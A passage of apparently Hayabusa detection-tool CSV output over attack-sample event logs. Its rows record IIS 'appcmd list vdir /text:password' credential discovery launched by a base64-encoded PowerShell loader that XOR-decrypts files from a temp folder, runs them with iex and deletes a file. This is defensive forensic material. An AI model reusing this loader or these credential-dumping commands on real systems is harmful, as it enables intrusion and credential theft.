dABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 